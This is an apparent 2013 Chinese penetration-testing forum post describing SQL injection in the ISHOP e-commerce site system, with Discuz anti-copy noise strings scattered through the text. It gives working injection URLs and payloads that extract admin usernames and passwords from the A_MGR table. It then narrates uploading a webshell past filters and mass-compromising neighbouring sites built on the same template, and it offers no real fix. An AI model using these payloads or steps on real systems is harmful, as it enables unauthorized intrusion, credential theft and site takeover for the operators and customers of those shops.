中国网络渗透测试联盟

标题: ISHOP商场建站系统注入漏洞 [打印本页]

作者: admin    时间: 2013-4-4 17:40
标题: ISHOP商场建站系统注入漏洞
发现一个注入点; J  Z) U4 N9 ]; h: z/ `" v4 c% ^
http://www.xxx.com /Diary_A.asp?UBID=&DCID=DC2012050610553697&DIID=DI2012050610583389) B/ _$ {. g( I* k2 A. b" ^
: ^7 _. R" `' U# O; t. l3 C- B
习惯性的加’having1=1--
( r( ]3 p0 ?# {) B9 [" c+ w# {3 A5 F. s0 H4 o% L; M: r
http://www.xxx.com.tw/Diary_A.asp?UBID=&DCID=DC2012050610553697&DIID=DI2012050610583389’having 1=1—" D8 I6 u  C4 @; B& }2 ^+ N
9 A$ Z  w5 W, T4 o/ Z0 S4 {6 }
09 ^- h% m4 x$ B

2 k  b) X& J) |爆出Diary_A.dl_Title(这时候很激动啊)
2 f8 W  P+ H) h( _& H2 E& `% J# a6 |7 O9 b1 h- `4 h
那么继续: W% f4 f6 a. |: E  |2 V" D
http://www.xxx.com.tw/Diary_A.asp?UBID=&DCID=DC2012050610553697&DIID=DI2012050610583389’group by dl_Title having 1=1—
. ~! [1 D9 e3 s1 x
3 o5 e6 B3 i% M- {继续,一直爆下去
) E% j* E, R; D4 A2 r6 u3 \' U9 [+ c' d1 y  ^- R2 X7 V6 u
爆到几个字段和表段 但是没找到需要的管理用户的字段
! j1 ?! r; k: a1 I% _) |; |
+ z! R: e, t" ]- R蛋疼了 怎么办 然后去后台登陆页看源码! r0 q4 T+ o2 }8 }+ \$ O* y
6 d4 k: \# x1 \* i: S0 v
0
* t5 l7 q8 }+ ~3 c8 B  V6 V
* g; @# l$ N5 D, m/ ]6 E1 IInput name= “ADUID”
  E5 k6 q' c* c5 }2 M/ a: H3 S; U: @Input name= “ADPWD”# [! U& F- Z+ n) ^# q
6 D3 ]8 X  k7 |/ c
很幸运 找到了字段那就继续$ i0 T( p& {& m
找到之后开始爆用户
1 P+ a1 |: b% Lhttp://www.xxx.com.tw/Diary_A.asp?UBID=&DCID=DC2012050610553697&DIID=DI2012050610583389'and(select top 1 MGR_UID from A_MGR)>0—
' W3 w2 W8 K, ?9 ?爆密码
0 x5 Y+ l  V- c; j; y' vhttp://www.xxx.com.tw/Diary_A.asp?UBID=&DCID=DC2012050610553697&DIID=DI2012050610583389'and(select top 1 MGR_PWD from A_MGR)>0—) O1 g2 _; C& @9 }  Q3 v, N2 g
测试了下 这个注入点只能爆到文章哪里的表
% m# m' S( M3 J& u, [3 c3 n
% Z, \" H% J$ X头疼 继续 既然只能报道文章哪里的表去后台爆 不过后台字符限制了7 \9 y( c0 Q+ y' X
7 h: X( O% W' p$ o+ |
又想到 用户登录哪里也可以的吧就去试试 果然 今天我很幸运吧 爆出来了! O: z! @( f3 P1 R

( f7 t7 l7 j7 ~) |473
; o" K  ]9 M( |; P7 i5 r, U6 H6 ~, Y* Q  c3 C
进后台, L1 e$ }0 d- x1 u+ i# i9 m
5 n3 s, R5 U, t" s( H2 {' L* i! P

% Z+ S! C& p! q发现几个上传点 有的地方不能上传 而且防止恶意代码
; a( C3 e3 p1 c) C+ P. W% z" W9 R) B/ R4 a* _
没办法 各种百度各种找大牛 找到一只好像可以突破的马
9 S3 S- I% }% e: S
2 j: Q6 C; l4 B/ u! p
6 H- m  b) A9 Z在系统管理那里直接上传 不过没有显示地址' @- a+ |2 n8 n

. J3 p, R4 k4 X- r2 i4 v' ^% y再上传一次 抓包 搞定OK5 l2 ~1 m% W* {) k

/ A4 z7 h! b9 t: M! e/ d4 q2 C# j( P5 \3 W8 o
( a% E) s8 \) G3 ^/ H, }! D
472! q$ n* k+ [& F& W+ d& I: r

8 J' O+ A4 R/ e% s  R- o% g7 S晚上不行了 去睡觉。。。
6 I" a5 F- J2 }6 d" e第二天刚起床 闲的没事做继续日站吧
) J+ M; B$ B8 E# A. @0 y
2 E) j9 W5 m. [( v* C找个站 就把这个站的旁c扫了下
# E; M( Z0 N) W8 d
% r( g% ]  ]! x发现c段也有一个购物站 ,然后还和这个站的模板差不多
' o; H3 w9 J$ H; A0 _+ M' U) A) q8 o! F% X
就找到会员登录口测试# v, G9 S) p1 U/ F
6 ]' R( q6 ~) n/ K
'and (select top 1 MGR_UID from A_MGR)>0—( f7 I# V! G! I3 Q% J* O
果断爆到了 这时候我很激动 通杀
( E; D7 e8 @( E8 [
- {5 K2 \. }9 |9 k6 w再次翻c段2 m  e+ u: j% L6 O8 Z

, A7 D! I* }2 k% D9 Z: p7 u翻出几个站 都成功拿下
: X+ k7 q* _9 I! S* ?' m
, F& H+ B4 |0 e  ]' D6 E! g. |
! S! {# Q3 l/ r: R! F+ s* q$ P( o
0 j6 h; ~1 e% _" z/ f# x) Q" a修复方案:" \+ Q3 P! I4 y$ L6 d8 q" U
他们比我专业 * U2 A9 }  v0 o8 r* Q' j) H- p
7 X: L% P3 ^' Q2 M

( i  G& L- t- P+ i2 y4 V$ Z- K" M1 e
0 z/ ?8 K4 K" |# W




欢迎光临 中国网络渗透测试联盟 (https://www.cobjon.com/) Powered by Discuz! X3.2